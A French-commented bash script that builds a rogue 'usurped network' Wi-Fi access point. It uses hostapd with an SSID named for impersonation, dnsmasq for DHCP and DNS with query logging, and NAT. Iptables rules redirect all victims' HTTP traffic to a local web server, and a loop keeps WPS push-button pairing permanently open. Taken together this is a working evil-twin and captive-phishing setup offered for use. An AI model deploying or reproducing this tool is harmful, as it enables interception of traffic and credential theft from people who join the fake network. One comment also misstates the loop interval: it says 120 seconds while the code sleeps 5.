#!/bin/bash
#BY BOB-LETANJ
#Ok avec FUJITSU
#require : hostapd dnsmasq wireless-tools iw wvdial aircrack-ng
#Verify that you have a running internet connection on the net_card before running the script

#Networking cards setting



if [ $# -eq 0 ]
then
	net_card=enp0s26u1u2
	ap_card=wlp2s0
	
elif [ $# -eq 2 ]
then
	net_card=$1
	ap_card=$2
else
	echo "usage : $0 NETCARD APCARD" >&2
	exit 1
fi 
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0

sudo airmon-ng check kill
sleep 1
#sudo nmcli nm wifi off 
sudo nmcli radio wifi off
sleep 1
sudo rfkill unblock wlan 
sudo rfkill unblock wifi

sudo ifconfig $ap_card down
sudo ifconfig $ap_card 10.0.0.1/24
sudo ifconfig $ap_card up

sudo sed -i 's#^DAEMON_CONF=.*#DAEMON_CONF=/etc/hostapd/hostapd.conf#' /etc/init.d/hostapd

#dnsmasq configuration
sudo cat << EOF > /etc/dnsmasq.conf
#log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=$ap_card
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF

#dnsmasq configuration
sudo cat << EOF > /etc/dnsmasq.d/dnsmasq.conf
#log-facility=/var/log/dnsmasq.log
#address=/#/10.0.0.1
#address=/google.com/10.0.0.1
interface=$ap_card
dhcp-range=10.0.0.10,10.0.0.250,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
#no-resolv
log-queries
EOF


#ip-forward activation
sudo echo '1' > /proc/sys/net/ipv4/ip_forward
#iptables configuration for net from ap_card to net_card access
sudo iptables -t nat -F
sudo iptables -F
sudo iptables -t nat -A POSTROUTING -o $net_card -j MASQUERADE
sudo iptables -A FORWARD -i $ap_card -o $net_card -j ACCEPT



#redirection http vers serveur web
sudo iptables -A OUTPUT -o $ap_card -p tcp --dport 443 -j ACCEPT
iptables -I INPUT 1 -m conntrack -j ACCEPT  --ctstate RELATED,ESTABLISHED

sudo iptables -A FORWARD -p tcp -m tcp -m multiport -d 10.0.0.1/24 -j ACCEPT --dports 80

sudo iptables -A PREROUTING -t nat -p tcp -m tcp -m multiport -i $ap_card -j DNAT --to-destination 10.0.0.1 --dports 80


#hostapd configuration
sudo cat << EOF > /etc/hostapd/hostapd.conf
# interface wlan du Wi-Fi
interface=$ap_card
# nl80211 avec tous les drivers Linux mac80211 
driver=nl80211
# Nom du spot Wi-Fi
ssid=RESEAU_USURPE
# mode Wi-Fi (a = IEEE 802.11a, b = IEEE 802.11b, g = IEEE 802.11g)
hw_mode=g
# canal de fréquence Wi-Fi (1-14)
channel=6
# Wi-Fi chiffré !
auth_algs=1
# Beacon interval in kus (1.024 ms)
beacon_int=100
# DTIM (delivery trafic information message) 
dtim_period=2
# Maximum number of stations allowed in station table
max_num_sta=255
# RTS/CTS threshold; 2347 = disabled (default)
rts_threshold=2347
# Fragmentation threshold; 2346 = disabled (default)
fragm_threshold=2346
wpa=2
#wpa_psk=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
wpa_passphrase=passphrase
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
rsn_pairwise=CCMP
# Enable internal EAP server for EAP-WSC (part of Wi-Fi Protected Setup)
eap_server=1
# WPS configuration (AP configured, do not allow external WPS Registrars)
wps_state=2
ap_setup_locked=1
# If UUID is not configured, it will be generated based on local MAC address.
#uuid=87654321-9abc-def0-1234-56789abc0000
wps_pin_requests=/var/run/hostapd.pin-req
pbc_in_m1=1
device_name=Wireless AP
manufacturer=Company
model_name=WAP
model_number=123
serial_number=12345
device_type=6-0050F204-1
os_version=01020300
config_methods=label display push_button keypad
ctrl_interface=/var/run/hostapd
EOF

#starting dhcp, dns and AP
sudo service dnsmasq start
sleep 5
sudo hostapd -d /etc/hostapd/hostapd.conf &

#WPS push button for connection every 120 sec
while true; do
	hostapd_cli wps_pbc
	sleep 5
done


